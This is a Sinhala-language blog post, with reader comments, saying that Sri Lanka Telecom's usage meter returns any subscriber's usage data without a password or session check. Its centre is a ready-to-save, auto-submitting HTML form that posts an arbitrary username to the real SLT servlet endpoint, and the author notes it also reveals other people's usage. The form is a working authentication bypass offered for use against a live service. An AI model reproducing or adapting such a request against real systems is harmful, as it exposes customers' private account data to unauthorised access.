SLT Usage Meter එක හැක් කරළද?

Is SLT Usage Meter Hacked?




මේදවස් වල හැම තැනම softwere කෑල්ලක් යනව SLT Usage Meter එක හැක් කලා කියලා.
ඇත්තටම එහෙම කරළද?
එක මේ Meter එක හදද්දි ඉතුරුවෙච්ච පුංචි හිලක්.
අපි පොඩි POST requests යැව්වහම මේ ගොයියා විස්තර ඔක්කොම පෙන්වනවා SESSION එක check කරන්නේ නෑ
ඒ කියන්නේ password ඕනෙ නෑ...

ඉක්මනට මේ හිල වහයි කියලා බලාපොරොත්තු වෙනවා.
හැබැයි ඉතින් වෙන කාහෙවත් Usage බලල මොනව කරන්නද?


භාවිතා මාපකය / Usage Meter

සේවාව / Service

පරිශීලක නාමය / User Name
මාසය 1 / Month 1
මාසය 2 / Month 2
මාසය 3 / Month 3
දිනය / Date
 "N" කියල තියෙන්නේ අද දිනේට හරියන විදිහට පෙන්නන්න කියලා system එකට කියන්න.
වෙනස් කරනවනම් month format එක ේං : OCT/2012

හැම තිස්සෙම මේපැත්තේ එන එක කරදරයි වගේ නම්, මේ පහලතියෙන code එක copy කරගන්න. ඊට පස්සේ notepad වගේ text editor එකක් open කරලා code එක paste කරලා, රතු පාටින් තියෙන "xx0000000" වෙනුවට ඔයාගේ User Name එක දාලා html document එකක් විදිහට save කරගන්න. ඒ කියන්නේ web browser එකකින් open කරන්න පුළුවන් file එකක් විදිහට. file එකේ extension එක .html උනානම් හරි.

<html>
<head>
<title>SLT Usage Meter</title>
</head>
<body>
<form name="myForm" id="myForm" action="http://webusage.slt.lk:8080/servlet/BmsWeb" method="POST">
<select name="service">
<option value="SLTBB">BROADBAND</option>
<option value="ROAM">ROAM</option>
<option value="WIFI">WIFI</option>
<option value="ISDN">ISDN</option>
<option value="PSTN">PSTN</option>
<option value="CDMA">CDMA</option>
</select>
<input name="userName" type="text" value="xx0000000">
<input name="mon1" type="text" value="N">
<input name="mon2" type="text" value="N">
<input name="mon3" type="text" value="N">
<input name="mon4" type="text" value="N">
<input name="I1" type="submit" value="submit">
</form>
<script type="text/javascript">
document.forms["myForm"].submit();
</script>
</body>
</html>

15 comments:

නිපුන් කොලුවා said...

ලංකාවේ හැකර්ලා.....
:D :D :D

Ε Γ И І И О said...
This comment has been removed by the author.
Dulanjana Alwis said...

කාහෙවත් Usage බලල මොනව කරන්නද?

Anonymous said...

password balannath puluwannam shook

Anonymous said...

Ela Ela Kolla
By EnRiQe

kespa.google.lk said...

:P

kespa said...

Huko anunge pahanin eliya balanna thoge weapons fire wenne nadda? gon hukanna tho danna hack ekak na, danagahala wadapiya thoge 2.50 blog ekata traffic adaganna chance ekak dunnata.

Buddhika Kandepola said...

ප්‍රිය ඇඩ්මින් වෙත,

ඔබේ බ්ලොග් අඩවියත් විකසිත සින්ඩියට එක්කර ගන්න. (Blog Syndicator)
Blogger සහ WordPress බ්ලොග් අඩවි සදහා එම අඩවියේ URL එක සහ බ්ලොග් එකෙහි නම ලබාදුන් සැනින් ස්වයංක්‍රියව සින්ඩිය හා ඇමුණුම සිදුවේ.
බ්ලොග් නොවන නමුත් Feeds සක්‍රිය වෙබ් අඩවි වුවද සින්ඩිය හා ඇමිණිය හැකිය.
විකසිත සින්ඩිය :- http://www.syndi.wikasitha.com/

මිට හිතාදර
ඇඩ්මින් - විකසිත සින්ඩිය. (info@vweb.lk)

kaushigan kumar said...

Meka dan wada karanne na. man dhethunsarayak use kara. dan wada karanne na. ai dhanne na. ? meka mage usage balanna thama use karanne. Slt eke yana eka hama thissama awl wenawa. mata meka podak check karala kiyanawadha?

Anonymous said...

දැන් ඉතින් පේනවා නේද පොර ටෝක් දැම්මට script kiddies ල කවුද කියල ? ... පොල් ටෝක් දන්නේ නැතුව ඕකත් හදපන් කොල්ලෝ ...

Working SLT Usage meters : (No-pass)

http://www.elakiri.com/forum/showthread.php?t=1593942

and

FF / Chrome add-on

http://www.elakiri.com/forum/showthread.php?t=1557258


ANONYMOUS ADMIN said...

den meka weda karann nedda ???

mehema Enawa "Oops! Google Chrome could not connect to webusage.slt.lk:8080"

Anonymous said...

Did you try this app, really nice app....
https://play.google.com/store/apps/details?id=com.olc.sltmeter

thilanga.ruk said...

cnt open

Ekathuwa Community said...

ලෝකයේ දුටු නුදුටු දේ දකින්න, ලෝකයේ සිමා මායිම් හබා යන්න, අලුත් විදියට ලෝකය දකින්න වෙර දරණ, ඔබ වෙනුවෙන්ම නිර්මාණය වූ ලංකාවේ හොදම තාක්ෂණික ෆෝරමය, ℯkathuwa.org. එන්න අප හා එක්වන්න දැනුමෙන් සන්නද්ද වන්න. ඔබ තවත් මේ ලෝකයේ මං මුලාවුවෙකු නොවේ!

Anonymous said...

පරිගණක ආරක්ෂාව සහ හැකින් පිළිබඳ අපේම ෆෝරමය.
http://www.yakadaya.com/

Post a Comment

අදහස් නම් අපිට හුගාක් වටිනවා.........

Related Posts with Thumbnails